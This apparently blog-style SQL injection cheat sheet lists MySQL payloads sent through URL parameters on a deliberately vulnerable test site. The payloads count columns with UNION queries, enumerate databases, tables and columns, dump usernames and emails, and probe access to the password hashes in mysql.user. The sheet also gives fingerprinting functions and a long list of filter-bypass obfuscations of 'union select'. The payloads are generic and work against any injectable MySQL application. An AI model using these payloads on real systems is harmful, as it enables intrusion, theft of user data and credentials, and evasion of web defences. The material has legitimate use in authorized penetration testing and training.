SQLi Cheat Sheet




Cheat Sheet


Below is a working, non-exhaustive list of SQL injection payloads and MySQL variables/functions for extracting data from a database through an injectable GET parameter in the URL. The examples use MySQL syntax and the deliberately vulnerable testphp.acunetix.com host; do not run them against systems you are not authorized to test.

If you have anything you feel could be added to any of the lists please feel free to write them in the comments and I'll update them accordingly.

Test number of Columns - Watch for Error (ORDER BY N errors once N exceeds the column count of the original query; a UNION must select exactly that many columns)
http://testphp.acunetix.com/artists.php?artist=1 order by 1,2,3,4
http://testphp.acunetix.com/artists.php?artist=1 order by 1,2,3,4 -- LIMIT 1
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 1/*
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 1,2/*
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 1,2,3/*
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 1,2,3,4/*
(add one column per request until the "different number of columns" error disappears; the "-1" makes the original query return no row, so the UNION row is what gets displayed)


Test Injectable Columns - Watch for visual indicators: the column number (or the database() value) that appears in the page is the column you can read data through. The variants below are the same query with WAF-evading comment/spacing tricks.
http://testphp.acunetix.com/artists.php?artist=1 -1 union all select 1,2,3,4
http://testphp.acunetix.com/listproducts.php?cat=1 -1 /*!UNiOn*/ /*!SeLEct*/ 1,database(),3,4,5,6,7,8,9,10,11
 http://testphp.acunetix.com/listproducts.php?cat=1%20%20-1%20%20%20/**//*!12345UNION%20SELECT*//**/%201,database%28%29,3,4,5,6,7,8,9,10,11
 http://testphp.acunetix.com/listproducts.php?cat=1%20%20-1%20%20%20%20/**//*!50000UNION%20SELECT*//**/%201,database%28%29,3,4,5,6,7,8,9,10,11
http://testphp.acunetix.com/listproducts.php?cat=1%20%20-1%20%20/**/UNION/**//*!50000SELECT*//**/%201,database%28%29,3,4,5,6,7,8,9,10,11
http://testphp.acunetix.com/listproducts.php?cat=1%20%20-1%20%20%20/*!50000UniON%20SeLeCt*/%201,database%28%29,3,4,5,6,7,8,9,10,11
--*See "Web Filter Bypass 'union select' keyword strings" below for more*--


Enumerate Information (MySQL version) - the second and third forms are for when @@version is filtered or rendered with a broken character set
http://testphp.acunetix.com/artists.php?artist=1 union all select 1,@@version,3,4
http://testphp.acunetix.com/artists.php?artist=1 union all select 1,unhex(hex(@@version)),3,4
(unhex(hex(x)) returns x unchanged and is used to slip past keyword filters; the reversed hex(unhex(x)) returns NULL for a non-hex string such as a version number)
http://testphp.acunetix.com/artists.php?artist=1 union all select 1,convert(@@version using latin1),3,4


Enumerate Database
http://testphp.acunetix.com/artists.php?artist=1 union all select 1,database(),3,4


Enumerate Tables
http://testphp.acunetix.com/listproducts.php?cat=1 -1 union all select 1,2,3,4,5,6,7,8,table_name,10,11 from information_schema.tables


Enumerate Columns - replace 'database' and 'table_name' with the values found above; step the LIMIT offset (LIMIT 0,1 / 1,1 / 2,1 ...) to walk the rows one at a time
http://testphp.acunetix.com/artists.php?artist=1 -1 union select all 1,2,column_name,4 from information_schema.columns where table_schema='database' and table_name='table_name' LIMIT 1,1 -- - LIMIT 1

Enumerate Raw Data - group_concat collapses many rows into one injectable column; 0x10a is the separator between fields (see the hex separator table below; 0x20 gives a plain space, 0x3a a colon)
http://testphp.acunetix.com/listproducts.php?cat=1 union select all 1,2,3,4,5,6,group_concat(uname,0x10a,email),8,9,10,11 FROM users

Confirm MySQL version (boolean-based) - if the page renders normally the comparison is true; =4 tests for MySQL 4.x, try 5 or 8 the same way. The second line is the template with the value left blank
http://testphp.acunetix.com/listproducts.php?cat=1 and substring(@@version,1,1)=4
http://testphp.acunetix.com/listproducts.php?cat=1 and substring(@@version,1,1)=


Test if subselect works - if returns true then subselect works
http://testphp.acunetix.com/listproducts.php?cat=1 and (select 1)=1

 
If subselect works, test for read access to mysql.user - a true result means the current DB user can read the mysql schema (normally a high-privilege account), so the password hashes in mysql.user are likely readable as well
http://testphp.acunetix.com/listproducts.php?cat=1 and (select 1 from mysql.user limit 0,1)=1
 

Injection - MySQL system variables and functions worth substituting into an injectable column (paths such as @@datadir/@@basedir/@@tmpdir are useful later for file read/write attempts)

@@hostname                             
@@tmpdir
@@datadir
@@basedir
@@log
@@log_bin                                                                
@@log_error                                                          
@@binlog_format                       
@@time_format                                                    
@@date_format                                                    
@@ft_boolean_syntax                                           
@@innodb_log_group_home_dir                                            
@@new                                                                  
@@version                                                              
@@version_comment
@@version_compile_os
@@version_compile_machine
@@GLOBAL.have_symlink
@@GLOBAL.have_ssl
@@GLOBAL.VERSION

version()                                                            
table_name   (column of information_schema.tables, not a function)
user()                                                                 
system_user()                                                          
session_user()
database()                                                             
column_name   (column of information_schema.columns, not a function)
collation(user())                                                      
collation(\N)                                                          
schema()
UUID()
current_user()
current_user


Fingerprinting MySQL when @@version/version() are filtered - from_days, dayname, monthname and from_unixtime are MySQL/MariaDB functions, and their output (a day or month name) is easy to spot in the page
dayname(from_days(401))
dayname(from_days(402))
dayname(from_days(403))
dayname(from_days(404))
dayname(from_days(405))
dayname(from_days(406))
dayname(from_days(407))

monthname(from_days(690))
monthname(from_unixtime(1))
                                          
collation(convert((1)using/**/koi8r))

(select(collation_name)from(information_schema.collations)where(id)=1 
(select(collation_name)from(information_schema.collations)where(id)=23 
(select(collation_name)from(information_schema.collations)where(id)=36 
(select(collation_name)from(information_schema.collations)where(id)=48 
(select(collation_name)from(information_schema.collations)where(id)=50 
... (continue incrementing the collation id; each returns a collation name such as koi8r_general_ci, which confirms MySQL even when version strings are blocked)


Adding Gaps Between output values - hex separators for group_concat and how each renders in the page (middle column is what you see, right column is the hex literal). Note that 0x10a has an odd number of digits, so MySQL reads it as 0x010a, i.e. a control byte plus a newline, which the browser shows as a space; for a real space use 0x20.

testtest        nospace    0x1a
test*test       *              0x2a
test:test       :                0x3a
test::test      ::                0x3a3a
testJtest       J               0x4a
testZtest      Z              0x5a
testjtest        j               0x6a
testztest       z               0x7a
testtest        nospace     0x8a
testtest        nospace     0x9a
test test       SPACE     0x10a


Web Filter Bypass 'union select' keyword strings - /*!NNNNN ... */ is a MySQL version comment: its content executes only when the server version is >= N.NN.NN (50000 = 5.0.0; 12345 = 1.23.45, i.e. effectively always), so it doubles as a crude version check if the page changes between variants


union select           
/*!UNiOn*/ /*!SeLEct*/
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*--*/union/*--*/select/*--*/
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
+UnIOn%0D%0ASeleCt%0D%0A 
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A 
